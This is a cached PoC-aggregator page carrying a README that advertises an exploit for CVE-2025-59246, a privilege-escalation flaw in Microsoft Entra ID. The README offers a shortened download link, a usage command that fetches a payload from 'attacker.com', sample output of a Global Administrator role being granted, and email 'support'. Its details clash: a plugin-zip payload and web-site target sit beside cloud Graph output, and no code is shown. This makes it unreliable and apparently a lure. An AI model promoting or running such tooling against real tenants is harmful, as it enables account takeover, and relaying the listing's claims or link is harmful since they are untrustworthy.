POC详情: a0c5a738788272147723cfad3286fb7cd0373b06

来源
关联漏洞
标题: Microsoft Entra ID 访问控制错误漏洞 (CVE-2025-59246)
描述:Microsoft Entra ID是美国微软(Microsoft)公司的一个基于云的身份和管理解决方案。 Microsoft Entra ID存在访问控制错误漏洞,该漏洞源于权限提升漏洞。
描述
Missing Authentication for Critical Function (CWE-306)
介绍
# CVE-2025-59246 Missing Authentication for Critical Function (CWE-306) - Exploit
## Overview
Azure Entra ID Elevation of Privilege Vulnerability that allows an attacker to gain higher-level access privileges within the Azure Entra ID system
## Exploit:
### [Download here](https://tinyurl.com/vktscj2f)


## Details
+ **CVE ID**: CVE-2025-59246
+ **Published**: 10/09/2025
+ **CVSS**: 9.8
+ **Affected Versoins**:Azure Entra ID all versions
## Impact
Impact: Unauthenticated attackers can gain administrative access, leading to data exfiltration, service disruption, or full tenant compromise.

## Usage 

### Prerequisites
- Python 3.8+
- Install dependencies: `pip install -r requirements.txt` (requires `requests` library).

### Basic Elevation
**Target a user (e.g., your test account) and elevate to Global Admin:**
bash
```
python exploit.py --target http://vulnerable-site.com --payload-url http://attacker.com/malicious-plugin.zip
```
### Output
```
[+] Connecting to legacy Graph endpoint...
[+] Bypassing auth check on /beta/admin/roles/sync
[+] Assigning Global Administrator role to testuser@contoso.com
[+] Verification: Role assigned successfully (HTTP 200)
[!] Warning: Role change may take 5-10 mins to propagate.
```
## What's Included:
**a ZIP file with:**

+ exploit.py: Fully functional Python script for payload generation and delivery.
+ Video demo and advanced customization guides.
+ Support: 30 days of email support for setup issues.
+ Disclaimer: This tool is for ethical penetration testing, red teaming, or educational use only. Vendor is not responsible for misuse. Ensure you have permission to test targets.

##  Feedback
Your feedback helps improve this project. If you find bugs or have suggestions, please report them on the GitHub issues page or contact me:harveyprime21@outlook.com.


文件快照

[4.0K] /data/pocs/a0c5a738788272147723cfad3286fb7cd0373b06 └── [1.8K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。